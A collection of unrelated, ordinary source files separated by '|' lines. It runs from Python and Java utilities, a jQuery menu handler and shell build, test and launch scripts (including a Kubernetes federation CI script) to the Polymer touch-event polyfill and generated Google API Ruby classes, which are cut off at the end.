def run(self):
self.start()
self.wait()
def descEC(self):
return f"exit code: {self.ec}"
def co2f(d:str):
if d=="inherit": return None
if d=="discard": return subprocess.DEVNULL
return fh(d.out)
def ro2f(d:str):
if d=="stdout": return stdout
if d=="stderr": return stderr
return fh(d)
def close(fh):
if fh!=None:
if type(fh) is not int: fh.close()
opened={}
def fh(path):
if path in opened: return opened[path]
try:
f=open(path,"a")
opened[path]=f
return f
except: error("指定したパスには書き込みできません: "+path)
def descTime(td):
t=""
r=td.seconds/3600
v=floor(r)
if v>=1: t+="{:.0f}h ".format(v)
r=(r-v)*60
v=floor(r)
if v>=1: t+="{:.0f}m ".format(v)
r=(r-v)*60
v=floor(r)
if v>=1: t+="{:.0f}s ".format(v)
t+="{:07.3f}ms".format(td.microseconds/1e+3)
return t
def descEC(ec):
return "terminated due to signal" if ec<0 else f"exit code: {ec}"
|
import java.util.Random;
public class RandomNumberGenerator {
public static int generateRandomInteger() {
Random random = new Random();
// Generates random integer number in range [0, 25]
int randomNumber = random.nextInt(25 + 1);
return randomNumber;
}
}
|
(function($){
var updateMenu = function(e) {
var list = e.length ? e : $(e.target)
$.post('/admin-menu',
JSON.stringify(list.nestable('serialize')),
function(data) {
console.log(data);
}
);
/*$.ajax({
url: '/admin-menu',
type: 'PUT',
dataType: 'application/json',
data: JSON.stringify(list.nestable('serialize'))
}).done(function(data) {
console.log(data);
});*/
/*$.ajax({
url: '/admin-menu',
type: 'PUT',
dataType: 'json',
headers: {
"Content-Type": "application/json"
},
data: JSON.stringify(list.nestable('serialize')),
success: function (data, textStatus, xhr) {
console.log(data);
},
error: function (xhr, textStatus, errorThrown) {
console.log('Error in Operation');
}
});*/
}
$('#nestable2').nestable({
group: 1,
maxDepth: 2
}).on('change', updateMenu);
})(jQuery)
|
#initial process_num
#initial process_num
process_num=0;
echo "------------------begin mips.sh----------------------"
ps -auxww | grep zemao | grep sim
let "process_num = 0"
for l1inset in 256; do
for hissize in 19 17 13 5 ; do
let "l1size=21-${hissize}"
#2 4 8 16
let "l2size=(2**(21))"
get_mips.py -f "./output/l1inset_${l1inset}_hissize_${hissize}*.out" -t "./config/l1inset_${l1inset}.cfg" >./output/l1inset_${l1inset}_hissize_${hissize}.mips &
let "process_num = $process_num +1"
echo "there are $process_num processes runing now. hissize_${hissize} l1inset=${l1inset} "
if [ $process_num -ge 20 ]; then
wait
let "process_num = 0"
fi
done
done
|
/*
* Copyright 2013 The Polymer Authors. All rights reserved.
* Use of this source code is governed by a BSD-style
* license that can be found in the LICENSE file.
*/
(function(scope) {
var dispatcher = scope.dispatcher;
var findTarget = scope.findTarget;
var allShadows = scope.targetFinding.allShadows.bind(scope.targetFinding);
var pointermap = dispatcher.pointermap;
var touchMap = Array.prototype.map.call.bind(Array.prototype.map);
// This should be long enough to ignore compat mouse events made by touch
var DEDUP_TIMEOUT = 2500;
var ATTRIB = 'touch-action';
var INSTALLER;
var HAS_TOUCH_ACTION = (typeof document.head.style.touchAction) === 'string';
// handler block for native touch events
var touchEvents = {
scrollType: new scope.SideTable,
events: [
'touchstart',
'touchmove',
'touchend',
'touchcancel'
],
register: function(target) {
if (HAS_TOUCH_ACTION) {
dispatcher.listen(target, this.events);
} else {
INSTALLER.enableOnSubtree(target);
}
},
unregister: function(target) {
if (HAS_TOUCH_ACTION) {
dispatcher.unlisten(target, this.events);
} else {
// TODO(dfreedman): is it worth it to disconnect the MO?
}
},
elementAdded: function(el) {
var a = el.getAttribute(ATTRIB);
var st = this.touchActionToScrollType(a);
if (st) {
this.scrollType.set(el, st);
dispatcher.listen(el, this.events);
// set touch-action on shadows as well
allShadows(el).forEach(function(s) {
this.scrollType.set(s, st);
dispatcher.listen(s, this.events);
}, this);
}
},
elementRemoved: function(el) {
this.scrollType.delete(el);
dispatcher.unlisten(el, this.events);
// remove touch-action from shadow
allShadows(el).forEach(function(s) {
this.scrollType.delete(s);
dispatcher.unlisten(s, this.events);
}, this);
},
elementChanged: function(el, oldValue) {
var a = el.getAttribute(ATTRIB);
var st = this.touchActiontoScrollType(a);
var oldSt = this.touchActionToScrollType(oldValue);
// simply update scrollType if listeners are already established
if (st && oldSt) {
this.scrollType.set(el, st);
allShadows(el).forEach(function(s) {
this.scrollType.set(s, st);
}, this);
} else if (oldSt) {
this.elementRemoved(el);
} else if (st) {
this.elementAdded(el);
}
},
scrollTypes: {
EMITTER: 'none',
XSCROLLER: 'pan-x',
YSCROLLER: 'pan-y',
SCROLLER: /^(?:pan-x pan-y)|(?:pan-y pan-x)|auto$/,
},
touchActionToScrollType: function(touchAction) {
var t = touchAction;
var st = this.scrollTypes;
if (t === 'none') {
return 'none';
} else if (t === st.XSCROLLER) {
return 'X';
} else if (t === st.YSCROLLER) {
return 'Y';
} else if (st.SCROLLER.exec(t)) {
return 'XY';
}
},
POINTER_TYPE: 'touch',
firstTouch: null,
isPrimaryTouch: function(inTouch) {
return this.firstTouch === inTouch.identifier;
},
setPrimaryTouch: function(inTouch) {
if (this.firstTouch === null) {
this.firstTouch = inTouch.identifier;
this.firstXY = {X: inTouch.clientX, Y: inTouch.clientY};
this.scrolling = false;
}
},
removePrimaryTouch: function(inTouch) {
if (this.isPrimaryTouch(inTouch)) {
this.firstTouch = null;
this.firstXY = null;
}
},
touchToPointer: function(inTouch) {
var e = dispatcher.cloneEvent(inTouch);
// Spec specifies that pointerId 1 is reserved for Mouse.
// Touch identifiers can start at 0.
// Add 2 to the touch identifier for compatibility.
e.pointerId = inTouch.identifier + 2;
e.target = findTarget(e);
e.bubbles = true;
e.cancelable = true;
e.button = 0;
e.buttons = 1;
e.width = inTouch.webkitRadiusX || inTouch.radiusX || 0;
e.height = inTouch.webkitRadiusY || inTouch.radiusY || 0;
e.pressure = inTouch.webkitForce || inTouch.force || 0.5;
e.isPrimary = this.isPrimaryTouch(inTouch);
e.pointerType = this.POINTER_TYPE;
return e;
},
processTouches: function(inEvent, inFunction) {
var tl = inEvent.changedTouches;
var pointers = touchMap(tl, this.touchToPointer, this);
pointers.forEach(inFunction, this);
},
// For single axis scrollers, determines whether the element should emit
// pointer events or behave as a scroller
shouldScroll: function(inEvent) {
if (this.firstXY) {
var ret;
var scrollAxis = this.scrollType.get(inEvent.currentTarget);
if (scrollAxis === 'none') {
// this element is a touch-action: none, should never scroll
ret = false;
} else if (scrollAxis === 'XY') {
// this element should always scroll
ret = true;
} else {
var t = inEvent.changedTouches[0];
// check the intended scroll axis, and other axis
var a = scrollAxis;
var oa = scrollAxis === 'Y' ? 'X' : 'Y';
var da = Math.abs(t['client' + a] - this.firstXY[a]);
var doa = Math.abs(t['client' + oa] - this.firstXY[oa]);
// if delta in the scroll axis > delta other axis, scroll instead of
// making events
ret = da >= doa;
}
this.firstXY = null;
return ret;
}
},
findTouch: function(inTL, inId) {
for (var i = 0, l = inTL.length, t; i < l && (t = inTL[i]); i++) {
if (t.identifier === inId) {
return true;
}
}
},
// In some instances, a touchstart can happen without a touchend. This
// leaves the pointermap in a broken state.
// Therefore, on every touchstart, we remove the touches that did not fire a
// touchend event.
// To keep state globally consistent, we fire a
// pointercancel for this "abandoned" touch
vacuumTouches: function(inEvent) {
var tl = inEvent.touches;
// pointermap.size should be < tl.length here, as the touchstart has not
// been processed yet.
if (pointermap.size >= tl.length) {
var d = [];
pointermap.forEach(function(key, value) {
// Never remove pointerId == 1, which is mouse.
// Touch identifiers are 2 smaller than their pointerId, which is the
// index in pointermap.
if (key !== 1 && !this.findTouch(tl, key - 2)) {
var p = value.out;
d.push(this.touchToPointer(p));
}
}, this);
d.forEach(this.cancelOut, this);
}
},
touchstart: function(inEvent) {
this.vacuumTouches(inEvent);
this.setPrimaryTouch(inEvent.changedTouches[0]);
this.dedupSynthMouse(inEvent);
if (!this.scrolling) {
this.processTouches(inEvent, this.overDown);
}
},
overDown: function(inPointer) {
var p = pointermap.set(inPointer.pointerId, {
target: inPointer.target,
out: inPointer,
outTarget: inPointer.target
});
dispatcher.over(inPointer);
dispatcher.down(inPointer);
},
touchmove: function(inEvent) {
if (!this.scrolling) {
if (this.shouldScroll(inEvent)) {
this.scrolling = true;
this.touchcancel(inEvent);
} else {
inEvent.preventDefault();
this.processTouches(inEvent, this.moveOverOut);
}
}
},
moveOverOut: function(inPointer) {
var event = inPointer;
var pointer = pointermap.get(event.pointerId);
// a finger drifted off the screen, ignore it
if (!pointer) {
return;
}
var outEvent = pointer.out;
var outTarget = pointer.outTarget;
dispatcher.move(event);
if (outEvent && outTarget !== event.target) {
outEvent.relatedTarget = event.target;
event.relatedTarget = outTarget;
// recover from retargeting by shadow
outEvent.target = outTarget;
if (event.target) {
dispatcher.leaveOut(outEvent);
dispatcher.enterOver(event);
} else {
// clean up case when finger leaves the screen
event.target = outTarget;
event.relatedTarget = null;
this.cancelOut(event);
}
}
pointer.out = event;
pointer.outTarget = event.target;
},
touchend: function(inEvent) {
this.dedupSynthMouse(inEvent);
this.processTouches(inEvent, this.upOut);
},
upOut: function(inPointer) {
if (!this.scrolling) {
dispatcher.up(inPointer);
dispatcher.out(inPointer);
}
this.cleanUpPointer(inPointer);
},
touchcancel: function(inEvent) {
this.processTouches(inEvent, this.cancelOut);
},
cancelOut: function(inPointer) {
dispatcher.cancel(inPointer);
dispatcher.out(inPointer);
this.cleanUpPointer(inPointer);
},
cleanUpPointer: function(inPointer) {
pointermap.delete(inPointer.pointerId);
this.removePrimaryTouch(inPointer);
},
// prevent synth mouse events from creating pointer events
dedupSynthMouse: function(inEvent) {
var lts = scope.mouseEvents.lastTouches;
var t = inEvent.changedTouches[0];
// only the primary finger will synth mouse events
if (this.isPrimaryTouch(t)) {
// remember x/y of last touch
var lt = {x: t.clientX, y: t.clientY};
lts.push(lt);
var fn = (function(lts, lt){
var i = lts.indexOf(lt);
if (i > -1) {
lts.splice(i, 1)
}
}).bind(null, lts, lt);
setTimeout(fn, DEDUP_TIMEOUT);
}
}
};
if (!HAS_TOUCH_ACTION) {
INSTALLER = new scope.Installer(touchEvents.elementAdded, touchEvents.elementRemoved, touchEvents.elementChanged, touchEvents);
}
scope.touchEvents = touchEvents;
})(window.PointerEventsPolyfill);
|
#!/usr/bin/env bash
# Copyright 2018 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script validates that binaries can be built and that all tests pass.
set -o errexit
set -o nounset
set -o pipefail
source "$(dirname "${BASH_SOURCE}")/util.sh"
ROOT_DIR="$(cd "$(dirname "$0")/.." ; pwd)"
MAKE_CMD="make -C ${ROOT_DIR}"
NUM_CLUSTERS="${NUM_CLUSTERS:-2}"
JOIN_CLUSTERS="${JOIN_CLUSTERS:-}"
DOWNLOAD_BINARIES="${DOWNLOAD_BINARIES:-}"
CONTAINER_REGISTRY_HOST="${CONTAINER_REGISTRY_HOST:-172.17.0.1:5000}"
COMMON_TEST_CMD="go test -v"
COMMON_TEST_ARGS="./test/e2e -args -ginkgo.v -single-call-timeout=1m -ginkgo.trace -ginkgo.randomizeAllSpecs"
MANAGED_E2E_TEST_CMD="${COMMON_TEST_CMD} -race ${COMMON_TEST_ARGS}"
# Specifying a kube config allows the tests to target deployed (unmanaged) fixture
UNMANAGED_E2E_TEST_CMD="${COMMON_TEST_CMD} ${COMMON_TEST_ARGS} -kubeconfig=${HOME}/.kube/config"
function build-binaries() {
${MAKE_CMD} hyperfed
${MAKE_CMD} controller
${MAKE_CMD} kubefed2
}
function download-dependencies() {
if [[ -z "${DOWNLOAD_BINARIES}" ]]; then
return
fi
./scripts/download-binaries.sh
}
function run-unit-tests() {
# Ensure the test binaries are in the path.
export TEST_ASSET_PATH="${base_dir}/bin"
export TEST_ASSET_ETCD="${TEST_ASSET_PATH}/etcd"
export TEST_ASSET_KUBE_APISERVER="${TEST_ASSET_PATH}/kube-apiserver"
${MAKE_CMD} test
}
function run-e2e-tests-with-managed-fixture() {
# Ensure the test binaries are in the path.
export TEST_ASSET_PATH="${base_dir}/bin"
export TEST_ASSET_ETCD="${TEST_ASSET_PATH}/etcd"
export TEST_ASSET_KUBE_APISERVER="${TEST_ASSET_PATH}/kube-apiserver"
${MANAGED_E2E_TEST_CMD}
}
function join-cluster-list() {
if [[ -z "${JOIN_CLUSTERS}" ]]; then
for i in $(seq 2 ${NUM_CLUSTERS}); do
JOIN_CLUSTERS+="cluster${i} "
done
export JOIN_CLUSTERS=$(echo ${JOIN_CLUSTERS} | sed 's/ $//')
fi
echo "${JOIN_CLUSTERS}"
}
function run-e2e-tests-with-unmanaged-fixture() {
${UNMANAGED_E2E_TEST_CMD}
}
function run-namespaced-e2e-tests-with-unmanaged-fixture() {
local namespaced_e2e_test_cmd="${UNMANAGED_E2E_TEST_CMD} -federation-namespace=foo -registry-namespace=foo -limited-scope=true"
# Run the placement test separately to avoid crud failures if
# teardown doesn't remove namespace placement.
${namespaced_e2e_test_cmd} --ginkgo.skip=Placement
${namespaced_e2e_test_cmd} --ginkgo.focus=Placement
}
function check-kubebuilder-output() {
./bin/kubebuilder generate
echo "Checking state of working tree after running 'kubebuilder generate'"
check-git-state
}
function check-install-yaml() {
PATH="${PATH}:${base_dir}/bin" FEDERATION_NAMESPACE=federation-system \
INSTALL_YAML=./hack/install-latest.yaml \
./scripts/generate-install-yaml.sh \
${CONTAINER_REGISTRY_HOST}/federation-v2:latest
echo "Checking state of working tree after generating install yaml"
check-git-state
}
function check-git-state() {
local output
if output=$(git status --porcelain) && [ -z "${output}" ]; then
return
fi
echo "ERROR: the working tree is dirty:"
for line in "${output}"; do
echo "${line}"
done
git diff
return 1
}
# Make sure, we run in the root of the repo and
# therefore run the tests on all packages
base_dir="$( cd "$(dirname "$0")/.." && pwd )"
cd "$base_dir" || {
echo "Cannot cd to '$base_dir'. Aborting." >&2
exit 1
}
echo "Downloading test dependencies"
download-dependencies
echo "Checking initial state of working tree"
check-git-state
echo "Verifying Gofmt"
./hack/go-tools/verify-gofmt.sh
echo "Checking that correct Error Package is used."
./hack/verify-errpkg.sh
echo "Checking that 'kubebuilder generate' is up-to-date"
check-kubebuilder-output
echo "Checking that hack/install-latest.yaml is up-to-date"
check-install-yaml
echo "Checking that fixture is available for all federate directives"
./scripts/check-directive-fixtures.sh
echo "Building federation binaries"
build-binaries
echo "Running unit tests"
run-unit-tests
echo "Running go e2e tests with managed fixture"
run-e2e-tests-with-managed-fixture
echo "Downloading e2e test dependencies"
./scripts/download-e2e-binaries.sh
export PATH=${TEST_ASSET_PATH}:${PATH}
CREATE_INSECURE_REGISTRY=y CONFIGURE_INSECURE_REGISTRY=y OVERWRITE_KUBECONFIG=y \
./scripts/create-clusters.sh
# Initialize list of clusters to join
join-cluster-list > /dev/null
echo "Deploying federation-v2"
./scripts/deploy-federation.sh ${CONTAINER_REGISTRY_HOST}/federation-v2:e2e $(join-cluster-list)
echo "Checking sync up status of helm chart"
BUILD_KUBEFED="false" PATH="${PATH}:${base_dir}/bin" ./scripts/sync-up-helm-chart.sh
echo "Checking helm chart state of working tree"
check-git-state
echo "Running go e2e tests with unmanaged fixture deployed by script"
run-e2e-tests-with-unmanaged-fixture
echo "Deleting federation-v2"
./scripts/delete-federation.sh
echo "Deploying federation-v2 with helm chart"
USE_CHART=y ./scripts/deploy-federation.sh ${CONTAINER_REGISTRY_HOST}/federation-v2:e2e $(join-cluster-list)
echo "Running go e2e tests with unmanaged fixture deployed by helm chart"
run-e2e-tests-with-unmanaged-fixture
echo "Deleting federation-v2 with helm chart"
USE_CHART=y ./scripts/delete-federation.sh
echo "Deploying namespaced federation-v2"
FEDERATION_NAMESPACE=foo NAMESPACED=y ./scripts/deploy-federation.sh ${CONTAINER_REGISTRY_HOST}/federation-v2:e2e $(join-cluster-list)
echo "Running go e2e tests with unmanaged fixture deployed by script"
run-namespaced-e2e-tests-with-unmanaged-fixture
echo "Deleting namespaced federation-v2"
FEDERATION_NAMESPACE=foo NAMESPACED=y DELETE_CLUSTER_RESOURCE=y ./scripts/delete-federation.sh
echo "Deploying federation-v2 with helm chart"
FEDERATION_NAMESPACE=foo NAMESPACED=y USE_CHART=y ./scripts/deploy-federation.sh ${CONTAINER_REGISTRY_HOST}/federation-v2:e2e $(join-cluster-list)
echo "Running go e2e tests with unmanaged fixture deployed by helm chart"
run-namespaced-e2e-tests-with-unmanaged-fixture
|
#!/bin/bash
docker run -d --rm --name blog -p 4000:4000 -w /srv/jekyll -v $(pwd):/srv/jekyll jekyll/jekyll:3.5.2 /bin/bash -c "bundle install && jekyll server -H 0.0.0.0 --watch"
echo "Waiting blog to launch on 4080..."
waitport() {
set -e
while ! curl --output /dev/null --silent --head --fail http://localhost:$1; do sleep 1 && echo -n .; done;
set +e
}
waitport 4000
echo "blog launched"
echo "Have fun on http://localhost:4000"
|
python main.py --model=NN_MC --mode=train --task=regression
python main.py --model=NN_MC --mode=train --task=classification --n_epochs=1000
python main.py --model=NN_MC --mode=train --task=regression --adversarial_training
python main.py --model=NN_MC --mode=train --task=classification --n_epochs=1000 --adversarial_training
python main.py --model=Deep_Ensemble --mode=train --task=regression
python main.py --model=Deep_Ensemble --mode=train --task=classification --n_epochs=1000
python main.py --model=Deep_Ensemble --mode=train --task=regression --adversarial_training
python main.py --model=Deep_Ensemble --mode=train --task=classification --n_epochs=1000 --adversarial_training
python main.py --model=SWAG --task=regression --mode=train --n_epochs=2000
python main.py --model=SWAG --task=regression --mode=train --n_epochs=3000 --adversarial_training
python main.py --model=SWAG --task=classification --mode=train --n_epochs=2000
python main.py --model=SWAG --task=classification --mode=train --n_epochs=2000 --adversarial_training
python main.py --model=LSTM_MC --task=regression --mode=train --n_epochs=1000
python main.py --model=LSTM_MC --task=regression --mode=train --n_epochs=2000 --adversarial_training
python main.py --model=LSTM_MC --task=classification --mode=train --n_epochs=1000
python main.py --model=LSTM_MC --task=classification --mode=train --n_epochs=1000 --adversarial_training
python main.py --model=BNN --task=regression --mode=train --n_epochs=2500
python main.py --model=BNN --task=regression --mode=train --n_epochs=3000 --adversarial_training
python main.py --model=BNN --task=classification --mode=train --n_epochs=500
python main.py --model=BNN --task=classification --mode=train --n_epochs=500 --adversarial_training
python main.py --model=GNN_MC --task=regression --mode=train --n_epochs=1000
python main.py --model=GNN_MC --task=regression --mode=train --n_epochs=1000 --adversarial_training
python main.py --model=GNN_MC --task=classification --mode=train --n_epochs=500
python main.py --model=GNN_MC --task=classification --mode=train --n_epochs=500 --adversarial_training
|
<filename>generated/google/apis/mybusiness_v3/representations.rb
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
module Google
module Apis
module MybusinessV3
class Account
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class AccountState
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class AdWordsLocationExtensions
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Address
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Admin
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class AssociateLocationRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Attribute
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class AttributeMetadata
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class AttributeValueMetadata
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class BatchGetLocationsRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class BatchGetLocationsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class BusinessHours
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Category
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ClearLocationAssociationRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Date
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Duplicate
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Empty
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class FindMatchingLocationsRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class FindMatchingLocationsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class GoogleUpdatedLocation
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class LatLng
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListAccountAdminsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListAccountsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListLocationAdminsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListLocationAttributeMetadataResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListLocationsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListReviewsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Location
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class LocationKey
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class LocationState
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class MatchedLocation
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Metadata
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OpenInfo
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Photos
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class PlaceInfo
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Places
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class PointRadius
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Review
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ReviewReply
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Reviewer
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ServiceAreaBusiness
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class SpecialHourPeriod
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class SpecialHours
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class TimePeriod
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class TransferLocationRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Account
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :account_name, as: 'accountName'
property :name, as: 'name'
property :role, as: 'role'
property :state, as: 'state', class: Google::Apis::MybusinessV3::AccountState, decorator: Google::Apis::MybusinessV3::AccountState::Representation
property :type, as: 'type'
end
end
class AccountState
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :status, as: 'status'
end
end
class AdWordsLocationExtensions
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :ad_phone, as: 'adPhone'
end
end
class Address
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :address_lines, as: 'addressLines'
property :administrative_area, as: 'administrativeArea'
property :country, as: 'country'
property :locality, as: 'locality'
property :postal_code, as: 'postalCode'
property :sub_locality, as: 'subLocality'
end
end
class Admin
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :admin_name, as: 'adminName'
property :name, as: 'name'
property :pending_invitation, as: 'pendingInvitation'
property :role, as: 'role'
end
end
class AssociateLocationRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :place_id, as: 'placeId'
end
end
class Attribute
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :attribute_id, as: 'attributeId'
property :value_type, as: 'valueType'
collection :values, as: 'values'
end
end
class AttributeMetadata
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :attribute_id, as: 'attributeId'
property :display_name, as: 'displayName'
property :group_display_name, as: 'groupDisplayName'
property :is_repeatable, as: 'isRepeatable'
collection :value_metadata, as: 'valueMetadata', class: Google::Apis::MybusinessV3::AttributeValueMetadata, decorator: Google::Apis::MybusinessV3::AttributeValueMetadata::Representation
property :value_type, as: 'valueType'
end
end
class AttributeValueMetadata
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :display_name, as: 'displayName'
property :value, as: 'value'
end
end
class BatchGetLocationsRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :location_names, as: 'locationNames'
end
end
class BatchGetLocationsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :locations, as: 'locations', class: Google::Apis::MybusinessV3::Location, decorator: Google::Apis::MybusinessV3::Location::Representation
end
end
class BusinessHours
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :periods, as: 'periods', class: Google::Apis::MybusinessV3::TimePeriod, decorator: Google::Apis::MybusinessV3::TimePeriod::Representation
end
end
class Category
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :category_id, as: 'categoryId'
property :name, as: 'name'
end
end
class ClearLocationAssociationRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class Date
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :day, as: 'day'
property :month, as: 'month'
property :year, as: 'year'
end
end
class Duplicate
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :location_name, as: 'locationName'
property :ownership, as: 'ownership'
end
end
class Empty
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class FindMatchingLocationsRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :language_code, as: 'languageCode'
property :max_cache_duration, as: 'maxCacheDuration'
property :num_results, as: 'numResults'
end
end
class FindMatchingLocationsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :match_time, as: 'matchTime'
collection :matched_locations, as: 'matchedLocations', class: Google::Apis::MybusinessV3::MatchedLocation, decorator: Google::Apis::MybusinessV3::MatchedLocation::Representation
end
end
class GoogleUpdatedLocation
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :diff_mask, as: 'diffMask'
property :location, as: 'location', class: Google::Apis::MybusinessV3::Location, decorator: Google::Apis::MybusinessV3::Location::Representation
end
end
class LatLng
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :latitude, as: 'latitude'
property :longitude, as: 'longitude'
end
end
class ListAccountAdminsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :admins, as: 'admins', class: Google::Apis::MybusinessV3::Admin, decorator: Google::Apis::MybusinessV3::Admin::Representation
end
end
class ListAccountsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :accounts, as: 'accounts', class: Google::Apis::MybusinessV3::Account, decorator: Google::Apis::MybusinessV3::Account::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class ListLocationAdminsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :admins, as: 'admins', class: Google::Apis::MybusinessV3::Admin, decorator: Google::Apis::MybusinessV3::Admin::Representation
end
end
class ListLocationAttributeMetadataResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :attributes, as: 'attributes', class: Google::Apis::MybusinessV3::AttributeMetadata, decorator: Google::Apis::MybusinessV3::AttributeMetadata::Representation
end
end
class ListLocationsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :locations, as: 'locations', class: Google::Apis::MybusinessV3::Location, decorator: Google::Apis::MybusinessV3::Location::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class ListReviewsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :average_rating, as: 'averageRating'
property :next_page_token, as: 'nextPageToken'
collection :reviews, as: 'reviews', class: Google::Apis::MybusinessV3::Review, decorator: Google::Apis::MybusinessV3::Review::Representation
